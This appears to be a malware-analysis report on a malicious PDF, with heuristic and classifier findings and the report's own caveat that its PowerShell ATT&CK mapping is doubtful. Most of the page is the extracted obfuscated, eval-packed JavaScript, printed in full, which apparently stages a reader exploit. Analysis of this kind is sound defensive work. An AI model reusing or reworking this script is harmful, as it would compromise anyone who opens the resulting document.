MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
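T1059.001 PowerShell (reviewer note: the findings shown on this page are PDF-embedded JavaScript only and no PowerShell activity is shown. ATT&CK tracks JavaScript execution under T1059.007, so treat this mapping as unconfirmed.)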
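The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics; on their own these are low severity, and the critical finding is the correlated PDF_JS_EXPLOIT_CLUSTER rule. The ML classifier strongly flagged this PDF as malicious. The embedded JavaScript stream, named javascript_obj0007_000.js, is obfuscated: the preview shows a wrapper function that passes a packed string to eval, and the packer's word list includes eval, unescape, String.fromCharCode and app.viewerVersion. The script is likely responsible for downloading and executing a second-stage payload, but that behaviour is inferred from static findings only and is not demonstrated on this page. The document body text appears to be nonsensical filler, suggesting the primary malicious function is within the script.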
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
,d \){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1z 2h\(10\){S O=0;S Y="";2i\(O=0;O<10.27;O++\){Y=Y+2n.1W\(10.2w\(O\)^1\)}1w Y}1z 1A\(1x\){1w 1E\(1x\)}S 14=1C.1F.1V\(\);14=14.1v\(/\\\\D/g,""\);S 1 … ) -
Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x36F | 8683 bytes |

SHA-256: 2827afae79ee8fb524cba4350537adfb871a45b724a6ddbcb47fc6053e20926b
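Detection
- ClamAV: No threats found (this is only the absence of a signature match; it does not override the critical heuristic and ML findings above)
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).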
Preview script: first 1,000 lines of the extracted script
function Chjycvkn(T36cf0qr){
eval (
T36cf0qr
);
}
Chjycvkn(
function(
p
,a
,c,k
,e
,d
){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1z 2h(10){S O=0;S Y="";2i(O=0;O<10.27;O++){Y=Y+2n.1W(10.2w(O)^1)}1w Y}1z 1A(1x){1w 1E(1x)}S 14=1C.1F.1V();14=14.1v(/\\D/g,"");S 1J="$1S$3l$1y$3m$2Z$A"+"Q$2Y$3e$3f$3g$3n"+"$3o$3v$3w$1n$t`3x$X"+"3u$3t$3p$3q$2X$2W"+"$2G$1y$2H$z$2I$2E"+"2D$2A$f$2B$2J$z"+"$2K$2S$N`$U$z$I"+"2T$1u$f$1e$1d$z"+"$H$N`$U$z$15$A"+"2N$P`1b$3z$2P$f$1g"+"$19$17$1a$18$1c$W"+"2O$H$N`$1t$B$R"+"$V$1p$f$J`K$L$A"+"2L$f$2M$V$1r$f"+"$M`$M`$J`K$L$12$A"+"Q$1s$N`$2Q$B$R"+"$M`$1i$1l`$J`K$L$A"+"2R$f$2V$I`1k$z$H"+"$N`$U$z$R$1u$A"+"Q$1e$1d$z$H$N`"+"$U$z$15$2C$P`1b$W"+"2y$2z$f$1g$19$17"+"$1a$18$1c$2F$H$P"+"1o`$1t$B$R$V$1p"+"$f$J`K$L$3s$f$I"+"3r$V$1r$f$M`$M`"+"$J`K$L$12$f$1s$P"+"1o`$t`3y$B$R$M`$1i"+"$1l`$J`K$L$12$f$3h"+"3i$I`1k$z$3k$3j$I`4d"+"$2x$2o$f$f$f$A"+"Q$f$f$f$f$1f"+"$1O$1N$1M$1K$1L$X"+"1P$1m$1Q$1U$1T$1B"+"$1D$1f$1I$1G$1H$16"+"1R$2p$2m$2q$2r$2v"+"$2u$2t$2s$2l$2k$23"+"4`d$21$1Z$1X$1Y$24"+"$f$1q$T$f$t`1h$P"+"2j$T$f$1n$2g$2U"+"$1q$T$f$4p$4Z$A"+"Q$1j`e$11$B$t`4U$1j`e"+"$11$B$4J$t`e`c$13$A"+"4I$f$4L`c$4M$4P`e$13"+"$T$f$4O$4R$4N$t`"+"4H$4G$4A$4z$4y$4B"+"$4C$3A$B$15$4F$t`"+"1h$4E$4D$4Q$B$H"+"$t`5f$13$T$f$5e$A"+"5c$f$f$f$f$f"+"$f$f$H$11$B$I"+"58$5a$5h$5i$5g$50`c"+"$54$4T$4V$4W$4Y$X"+"4X$4S$4K$4w$3Q$3P"+"$3O$3N$3R$1m$3S$X"+"3V$3U$3T$3M$3L$3E"+"$3D$3C$3B$3F$3G$3K"+"3J$3I$3H$3W$3X$4q`"+"$4x$4o$4n$W`6$4r$W"+"4s$4v$4u$4t$4m$4l"+"$44$40$3Z$3Y$4b$16"+"4g$4k$4j"+"";S 
Z="@p@y@28"+"@4f@r@7"+"@31@36@o"+"@q@2e@j"+"@x@3@2"+"@41@i@28"+"@30@29@20"+"@3d@3d@20"+"@22@38@22"+"@20@26@26"+"@20@4f@r"+"@7@31@36"+"@o@q@2e"+"@j@x@3"+"@2@41@i"+"@28@31@29"+"@20@3c@3d"+"@20@22@31"+"@22@20@26"+"@26@20@4f"+"@r@7@31"+"@36@o@q"+"@2e@j@x"+"@3@2@41"+"@i@28@32"+"@29@20@3c"+"@3d@20@22"+"@32@22@29"+"@E@b@l"+"@4c@q@2"+"@p@8@5"+"@s@s@20"+"@3d@20@4c"+"@5@w@36"+"@G@r@33"+"@28@59@q"+"@39@q@G"+"@n@28@4c"+"@32@37@q"+"@i@38@a"+"@29@29@3b"+"@b@l@n"+"@3@2@20"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@20@3d@20"+"@4c@5@w"+"@36@G@r"+"@33@28@22"+"@25@8@30"+"@3@30@3"+"@22@20@2b"+"@20@22@25"+"@8@30@3"+"@30@3@22"+"@20@2b@20"+"@22@22@29"+"@3b@b@l"+"@n@3@2"+"@20@52@v"+"@h@o@m"+"@3@20@3d"+"@20@32@30"+"@20@2b@20"+"@4c@q@2"+"@p@8@5"+"@s@s@2e"+"@h@6@9"+"@m@i@x"+"@3b@b@l"+"@F@x@p"+"@h@6@28"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@2e@h@6"+"@9@m@i"+"@x@20@3c"+"@20@52@v"+"@h@o@m"+"@3@29@20"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@20@2b@3d"+"@20@48@o"+"@2@a@39"+"@v@6@31"+"@9@3b@b"+"@l@n@3"+"@2@20@4a"+"@34@34@k"+"@r@h@7"+"@32@20@3d"+"@20@48@o"+"@2@a@39"+"@v@6@31"+"@9@2e@5"+"@8@s@5"+"@i@2@p"+"@9@m@28"+"@30@2c@20"+"@52@v@h"+"@o@m@3"+"@29@3b@b"+"@l@n@3"+"@2@20@42"+"@7@31@r"+"@3@30@38"+"@h@20@3d"+"@20@48@o"+"@2@a@39"+"@v@6@31"+"@9@2e@5"+"@8@s@5"+"@i@2@p"+"@9@m@28"+"@30@2c@20"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@2e@h@6"+"@9@m@i"+"@x@20@2d"+"@20@52@v"+"@h@o@m"+"@3@29@3b"+"@b@l@F"+"@x@p@h"+"@6@28@42"+"@7@31@r"+"@3@30@38"+"@h@2e@h"+"@6@9@m"+"@i@x@20"+"@2b@20@52"+"@v@h@o"+"@m@3@20"+"@3c@20@30"+"@k@36@30"+"@30@30@30"+"@29@20@42"+"@7@31@r"+"@3@30@38"+"@h@20@3d"+"@20@42@7"+"@31@r@3"+"@30@38@h"+"@20@2b@20"+"@42@7@31"+"@r@3@30"+"@38@h@20"+"@2b@20@4a"+"@34@34@k"+"@r@h@7"+"@32@3b@b"+"@l@n@3"+"@2@20@51"+"@o@q@7"+"@r@v@34"+"@p@n@20"+"@3d@20@9"+"@6@F@20"+"@41@2@2"+"@3@r@28"+"@29@3b@b"+"@l@y@u"+"@2@28@55"+"@8@5@j"+"@34@j@2"+"@20@3d@20"+"@30@3b@20"+"@55@8@5"+"@j@34@j"+"@2@20@3c"+"@20@31@32"+"@30@30@3b"+"@20@55@8"+"@5@j@34"+"@j@2@2b"+"@2b@29@E"+"@51@o@q"+"@7@r@v"+"@34@p@n"+"@5b@55@8"+"@5@j@34"+"@j@2@5d"+"@20@3d@20"+"@42@7@31"+"@r@3@30"+
"@38@h@20"+"@2b@20@4c"+"@q@2@p"+"@8@5@s"+"@s@C@b"+"@l@n@3"+"@2@20@53"+"@a@6@8"+"@7@k@20"+"@3d@20@22"+"@31@32@22"+"@3b@b@l"+"@y@u@2"+"@20@28@n"+"@3@2@20"+"@46@a@5"+"@s@a@i"+"@5@3d@30"+"@3b@20@46"+"@a@5@s"+"@a@i@5"+"@3c@31@38"+"@3b@20@46"+"@a@5@s"+"@a@i@5"+"@2b@2b@29"+"@E@20@53"+"@a@6@8"+"@7@k@20"+"@3d@20@53"+"@a@6@8"+"@7@k@2b"+"@22@39@22"+"@3b@C@b"+"@l@y@u"+"@2@20@28"+"@n@3@2"+"@20@46@a"+"@5@s@a"+"@i@5@3d"+"@30@3b@20"+"@46@a@5"+"@s@a@i"+"@5@3c@32"+"@37@36@3b"+"@20@46@a"+"@5@s@a"+"@i@5@2b"+"@2b@29@E"+"@20@53@a"+"@6@8@7"+"@k@20@3d"+"@20@53@a"+"@6@8@7"+"@k@2b@22"+"@38@22@3b"+"@C@b@20"+"@20@20@20"+"@8@i@p"+"@h@2e@w"+"@2@p@9"+"@i@y@28"+"@22@25@34"+"@35@30@30"+"@30@y@22"+"@2c@20@53"+"@a@6@8"+"@7@k@29"+"@3b@b@C"+"@b@6@h"+"@5@6@E"+"@b@20@20"+"@20@20@b"+"@l@n@3"+"@2@20@42"+"@3@k@32"+"@w@p@7"+"@38@33@20"+"@3d@20@9"+"@6@F@20"+"@41@2@2"+"@3@r@28"+"@29@3b@b"+"@l@y@8"+"@9@j@i"+"@p@u@9"+"@20@4a@9"+"@32@a@35"+"@5@31@28"+"@4f@m@8"+"@34@7@k"+"@33@2c@20"+"@4c@q@5"+"@30@6@y"+"@a@29@E"+"@b@l@F"+"@x@p@h"+"@6@28@4f"+"@m@8@34"+"@7@k@33"+"@2e@h@6"+"@9@m@i"+"@x@20@2a"+"@20@32@20"+"@3c@20@4c"+"@q@5@30"+"@6@y@a"+"@29@E@b"+"@l@4f@m"+"@8@34@7"+"@k@33@20"+"@2b@3d@20"+"@4f@m@8"+"@34@7@k"+"@33@3b@C"+"@b@l@4f"+"@m@8@34"+"@7@k@33"+"@20@3d@20"+"@4f@m@8"+"@34@7@k"+"@33@2e@5"+"@8@s@5"+"@i@2@p"+"@9@m@28"+"@30@2c@20"+"@4c@q@5"+"@30@6@y"+"@a@20@2f"+"@20@32@29"+"@3b@b@l"+"@2@6@i"+"@8@2@9"+"@20@4f@m"+"@8@34@7"+"@k@33@3b"+"@C@b@l"+"@n@3@2"+"@20@56@3"+"@r@35@s"+"@2@7@20"+"@3d@20@30"+"@k@30@j"+"@30@j@30"+"@j@30@j"+"@3b@b@l"+"@n@3@2"+"@20@57@32"+"@6@q@36"+"@9@20@3d"+"@20@4c@5"+"@w@36@G"+"@r@33@28"+"@59@q@39"+"@q@G@n"+"@28@4c@32"+"@37@q@i"+"@38@a@29"+"@29@3b@b"+"@l@n@3"+"@2@20@49"+"@n@35@w"+"@a@7@20"+"@3d@20@30"+"@k@34@30"+"@30@30@30"+"@30@3b@b"+"@l@n@3"+"@2@20@55"+"@w@31@34"+"@32@F@39"+"@34@20@3d"+"@20@57@32"+"@6@q@36"+"@9@2e@h"+"@6@9@m"+"@i@x@20"+"@2a@20@32"+"@3b@b@l"+"@n@3@2"+"@20@4c@q"+"@5@30@6"+"@y@a@20"+"@3d@20@49"+"@n@35@w"+"@a@7@20"+"@2d@20@28"+"@55@w@31"+"@34@32@F"+"@39@34@2b"+"@30@k@33"+"@38@29@3b"+"@b@l
@n"+"@3@2@20"+"@4f@m@8"+"@34@7@k"+"@33@20@3d"+"@20@4c@5"+"@w@36@G"+"@r@33@28"+"@22@25@8"+"@39@30@39"+"@30@25@8"+"@39@30@39"+"@30@22@29"+"@3b@b@l"+"@4f@m@8"+"@34@7@k"+"@33@20@3d"+"@20@4a@9"+"@32@a@35"+"@5@31@28"+"@4f@m@8"+"@34@7@k"+"@33@2c@20"+"@4c@q@5"+"@30@6@y"+"@a@29@3b"+"@b@l@n"+"@3@2@20"+"@42@2@j"+"@39@x@34"+"@i@20@3d"+"@20@28@56"+"@3@r@35"+"@s@2@7"+"@20@2d@20"+"@30@k@34"+"@30@30@30"+"@30@30@29"+"@20@2f@20"+"@49@n@35"+"@w@a@7"+"@3b@b@l"+"@y@u@2"+"@20@28@n"+"@3@2@20"+"@4e@u@k"+"@p@9@9"+"@2@2@20"+"@3d@20@30"+"@3b@20@4e"+"@u@k@p"+"@9@9@2"+"@2@20@3c"+"@20@42@2"+"@j@39@x"+"@34@i@3b"+"@4e@u@k"+"@p@9@9"+"@2@2@2b"+"@2b@29@E"+"@42@3@k"+"@32@w@p"+"@7@38@33"+"@5b@4e@u"+"@k@p@9"+"@9@2@2"+"@5d@20@3d"+"@20@4f@m"+"@8@34@7"+"@k@33@20"+"@2b@20@57"+"@32@6@q"+"@36@9@3b"+"@C@b@l"+"@n@3@2"+"@20@47@38"+"@j@v@o"+"@u@w@20"+"@3d@20@4c"+"@5@w@36"+"@G@r@33"+"@28@22@25"+"@8@30@j"+"@30@j@22"+"@20@2b@20"+"@22@25@8"+"@30@j@30"+"@j@22@20"+"@2b@20@22"+"@22@29@3b"+"@b@l@F"+"@x@p@h"+"@6@28@47"+"@38@j@v"+"@o@u@w"+"@2e@h@6"+"@9@m@i"+"@x@20@3c"+"@20@34@34"+"@39@35@32"+"@29@20@47"+"@38@j@v"+"@o@u@w"+"@20@2b@3d"+"@20@47@38"+"@j@v@o"+"@u@w@3b"+"@b@l@i"+"@x@p@5"+"@2e@j@u"+"@h@h@3"+"@s@53@i"+"@u@2@6"+"@20@3d@20"+"@43@u@h"+"@h@3@s"+"@2e@j@u"+"@h@h@6"+"@j@i@45"+"@o@3@p"+"@h@49@9"+"@y@u@28"+"@E@5@8"+"@s@7@3a"+"@20@22@22"+"@2c@o@5"+"@m@3a@20"+"@47@38@j"+"@v@o@u"+"@w@C@29"+"@3b@b@C"+"";Z=Z.1v(/@/g,"%4i");4h(1A(Z));',62,329,'||72|61||73|65|6a|75|6e|64|0a||||t1111||6c|74|63|78|09|67|76|6d|69|6b|79|62||6f|71|70|68|66|t1110|t1|t1113|7d||7b|77|7a|t9811|t4|td|98|tb390|t117|t90d|Eaf11w|t9|111|t4311|var|t130c|t4db3|t84gg|t2|t5|Ymvmja|Fe95b8ty|Vbsgdfgi|t0c94|t104d|t9412|Oyj16mk|t2011|t7|t9917|tdc57|t6511|t230b|b3|tb7dd|t5d84|tgg11|t7456|tgc91|e77|te1gg|t12|84|t147|t707g|t619c|0d|t1043|tc412|t1047|t9843|t54b3|t9179|replace|return|Ynayhkxfmz|t4647|function|Lsp6zy3|t6863|app|t1150|unescape|viewerVersion|t7g63|t5072|t4165|L27kt8d|t6570|t5079|t4161|t7e74|t4565|b11|t5b75|575|t4241|t7063|t7378|toString|fromCharCode|t20g8|tcd
b1|t98g6||t38ge||t6|t112b|||length|||||||||t9269|Yk9kzv|for|412|tb121|tg698|t6262|String|tb249|t7463|t4611|t7d78|tg398|tcc11|t7274|t6954|charCodeAt|t4c48|48b|t137d|t105d|tdg10|t10g7|gdd|tc|t2315|t2b51|t4dcd|t1011|te7d9|t4g11|341|t4143|0g7|315|t1372|t69b3|04d|t984d|311|t0bb7|tgg43|t9c6b|t519e|t4e11|t11d9|||||||||||||||tde92|t201e|t75b1|tg|g43|t4g4e|t8e11|t4340|t8b44|t5112|t6921|t9c18|t2551|143|t1341|tdc19|19c|t9c1b|t1b51|e0b|7b3|t248b|t3694|t1174|t6974|t3d75|t6164|t6372|t6270|t1161|t7961|d79|t3|t7775|t6111|t667g|t555b|t4344|t115b|t7b7d|t4575|t5074|t7b78|77g|t6579|t6165|t3724|t2e75|t782g||||t6179|||||||t7479|||||b7b|eval|u00|t8111|t267g|t613d|t747e|t703d|t7b24|tce9e|t3g2|t2129|129|t7g72|t7b74|t663g|t5b55|t703g|t4dd8|tdc52|t4d15|te082|t12d1|t1213|td1b0|t87g7|t6548|7g2|30c|t4111|t3d5d|t4d|tec20|tgb40|tb798|t47|t0g94|te698|t5g5e|tcc2d|c11|t1365|tdedc|b43|t44b2|t130g|t10||||t91bd||||711||td946||101||tdcb2|eb7|t4d4g|tgg49|tgggg'.split('|'),0,{}))